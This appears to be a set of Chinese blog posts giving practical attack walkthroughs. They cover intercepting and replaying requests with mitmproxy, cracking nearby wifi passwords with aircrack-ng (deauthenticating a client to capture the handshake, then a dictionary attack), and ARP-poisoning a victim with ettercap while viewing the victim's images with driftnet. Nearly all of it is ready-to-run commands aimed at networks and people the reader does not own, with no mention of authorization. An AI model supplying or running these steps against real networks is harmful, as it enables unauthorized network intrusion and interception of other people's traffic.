分类
IT运维

mitmproxy中间人攻击利器

mitmproxy就是代理,有篡改功能的代理。它支持两种模式,正向代理,与透明代理,支持http通信与https通信。
1>mitmproxy安装
sudo apt-get install mitmproxy
2>mitmproxy使用
mitmproxy -p xxx(指定端口)
3>mitmproxy常见操作
(1)方向键定位请求
(2)当黄色箭头>>定位到指定请求时,按回车enter进入请求中
(3)按e进入编辑状态
(4)a 增加一行,tab键切换编辑字段,回车enter开始编辑,esc保存,q返回上一级
(5)修改完后,按r就可以重放请求

分类
IT运维

利用aircrack-ng工具获取附近wifi的密码

1>关闭网络
service network-manager stop

2>结束可能会影响结果的进程
airmon-ng check kill

3>查看网卡列表
iwconfig

4>启动网卡到监听模式(这里使用wlan0)
airmon-ng start wlan0

5>监听周围所有无线网络信息
airodump-ng mon0

6>监听感兴趣的无线网络
airodump-ng –bssid C0:XX:XX:XX:XX -c 1 -w tmp mon0
在这条命令中–bssid后接我们上一部接下的BSSID值,即:C0:XX:XX:XX:XX:00。而-c后接的是我上一步在CH列下找到的值1。而-w后接的是我们保存网络数据的文件名,这里是用tmp。在命令的最后接的是之前得到的mon0
运行命令后会得到上图的结果,并确保上图的下半部分BSSID下有至少一行的数据

7>得到握手包
保持上一步中的窗口不关,新开一个窗口,执行如下命令:
aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0
在这条命令中参数-a后接的是上图中下半部分BSSID列下第一行的的值C0:XX:XX:XX:XX:00。参数-c后接的是上图中下半部分STATION列下第一行的的值14:XX:XX:XX:XX:B4。mon是之前步骤得到的值。

8>关闭监听接口
airmon-ng stop mon0

9>启动网络
service network-manager start

10>获取密码
此时在执行第3.2步骤中命令的目录下会有一个tmp-01.cap文件。有了这个文件我们就可以破解密码了,除了这个文件外,我们还需要一个字典文件。可以从这里下载,下载后解压出密码文件,假设其名字及路径为:/tmp/passwd.txt。执行下面的命令。如果密码字典中有这个wifi的密码,我们就可以破解出密码:
aircrack-ng tmp-01.cap -w /tmp/passwd.txt

分类
IT运维

使用ettercap和drifnet进行arp攻击测试

1、攻击者ip:192.168.1.101
网关:192.168.1.1
被攻击者ipip:192.168.1.102

2、使用iwconfig命令查看无线网卡名称为wlan0

3、ettercap命令如下:
ettercap -i wlan0 -Tq -M arp:remote //192.168.1.102// //192.168.1.1//

4、使用driftnet查看图片
driftnet -i wlan0